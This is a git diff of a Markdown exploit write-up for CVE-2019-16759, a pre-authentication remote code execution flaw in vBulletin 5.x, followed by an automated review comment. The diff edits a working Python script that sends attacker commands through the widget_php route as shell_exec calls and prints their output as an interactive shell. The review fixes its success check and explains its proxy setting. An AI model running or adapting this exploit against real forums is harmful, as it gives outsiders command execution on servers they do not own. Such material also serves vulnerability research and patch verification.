diff --git a/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md b/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md index 41d2bbb..1567da0 100644 --- a/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md +++ b/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md @@ -45,22 +45,27 @@ import sys if len(sys.argv) != 2: sys.exit("Usage: %s " % sys.argv[0]) +proxies ={ + "http":"http://127.0.0.1:8080/" +} params = {"routestring":"ajax/render/widget_php"} while True: try: - cmd = raw_input("vBulletin$ ") - params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;" - r = requests.post(url = sys.argv[1], data = params) - if r.status_code == 200: - print r.text + cmd = raw_input(">>>Shell= ") + params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;" + r = requests.post(url = sys.argv[1], data = params, proxies=proxies) + if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text: + print + print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0] else: sys.exit("Exploit failed! :(") except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception, e: sys.exit(str(e)) + ``` ### 复现截图 -![vBulletin](img/41.png) \ No newline at end of file +![vBulletin](img/41.png)
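Review bot: In the new success test `and` binds tighter than `or`, so `r.status_code == 200 or r.status_code ==403 and '…' in r.text` accepts every 200 response whether or not the marker is present. A patched host that answers with an ordinary 200 page is then reported as vulnerable and its whole body is printed, which makes the script unreliable for confirming remediation. Requiring the marker in both cases fixes that: `if r.status_code in (200, 403) and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:`. The 403 branch also deserves a comment such as `# a 403 whose body still carries the marker means the request was processed; the status code alone does not show it was blocked`, since that is the point a defender tuning a filter needs from this change. The added `proxies` dict is hard-coded to `http://127.0.0.1:8080/` and passed unconditionally, so the script exits on a connection error unless a local proxy is listening, and the surrounding document should say so; the script's imports lie outside the hunk.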